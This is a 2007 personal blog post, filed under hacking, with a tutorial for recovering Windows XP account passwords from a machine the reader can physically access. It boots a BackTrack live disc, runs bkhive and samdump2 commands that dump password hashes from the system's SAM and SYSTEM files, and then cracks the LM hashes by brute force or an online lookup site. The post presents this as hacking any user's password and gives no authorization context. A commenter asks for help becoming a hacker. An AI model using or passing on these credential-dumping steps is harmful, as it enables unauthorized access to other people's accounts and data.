Anils blog

«
»

Hack winXP admin or any user password

Posted by anil soni on March 14, 2007

This tutorial will teach you how to get windows XP user password, if you have physical acces to that computer. For this you have to follow the following steps:

  1. Download Backtrack iso image from http://mirror.switch.ch/ftp/mirror/backtrack/bt2final.iso (~700MB)

  2. After download is complete you can either burn it on disc or you can create a bootable pen drive. For Creating bootable pen drive mount this disc on your favourite virtual drive (alchol 120%, cloneCD, virtualCD) and from command prompt type
    g:\make_disc.bat k:
    Here i am assuming g: as your virtual CDrom drive letter and k: as your pen drive letter

  3. Now your bootable media is ready. Boot the system with your bootable media for this change the first boot device in BIOS to CDROM if you have burned a DISC and if you are using a pen drive then set first boot device to USB-HDD or USB-FDD.

  4. After getting the KDE desktop of backtrack start the console and type
    bkhive /mnt/hda1/WINDOWS/system32/config/system /mnt/hda1/keyfile
    here /mnt/hda1 is your c:\ and i am assuming that your c:\ is FAT32 fromatted and not NTFS otherwise you have to find one such partition using mount command for keyfile. If you are using a pen drive then dont worry about the filesystem simply use this command
    bkhive /mnt/hda1/WINDOWS/system32/config/system keyfile

    bkhive get the system key which is used to remove the extra encryption from SAM database.

  5. Now type another command which is used to Dump the password from SAM file
    samdump2 /mnt/hda1/WINDOWS/system32/config/SAM /mnt/hda1/keyfile > pwdumpfile.txt
    or if you have diffrent location for keyfile then use that location instead of /mnt/hda1/keyfile and again if you are using a pen drive then simply use this command
    samdump2 /mnt/hda1/WINDOWS/system32/config/SAM keyfile > pwdumpfile.txt

  6. Final step, in previous step we have successfully dumped passwords for all user in pwdumpfile.txt. This file contains the password of all users, but these password are still not readable because they are in form LM hash, so to reverse these LM hashes use either SAMinside which will crack the password for you using brute-force or dictionary attack or submit your hashes at www.plain-text.info (simple and fast, preffered).

    7. source: See video version at irongeek http://www.irongeek.com/i.php?page=videos/backtrackplaintext

    Advertisement

This entry was posted on March 14, 2007 at 8:32 pm and is filed under Hacking. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

One Response to “Hack winXP admin or any user password”

  1. abhishek said

    February 7, 2011 at 2:01 am

    sir can u tell me any other site for free download the backtrack please .
    because here occur any problem or error to open the page .
    sir please help me .
    and sir can u tell me too much things for hacking because i want to a hacker , ir please reply please help me ,and here is not any guide to help me . so please help me .
    sir my gmail id is abhishek.abhi59@gmail.com

    Reply

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s

«
»
 
Follow

Get every new post delivered to your Inbox.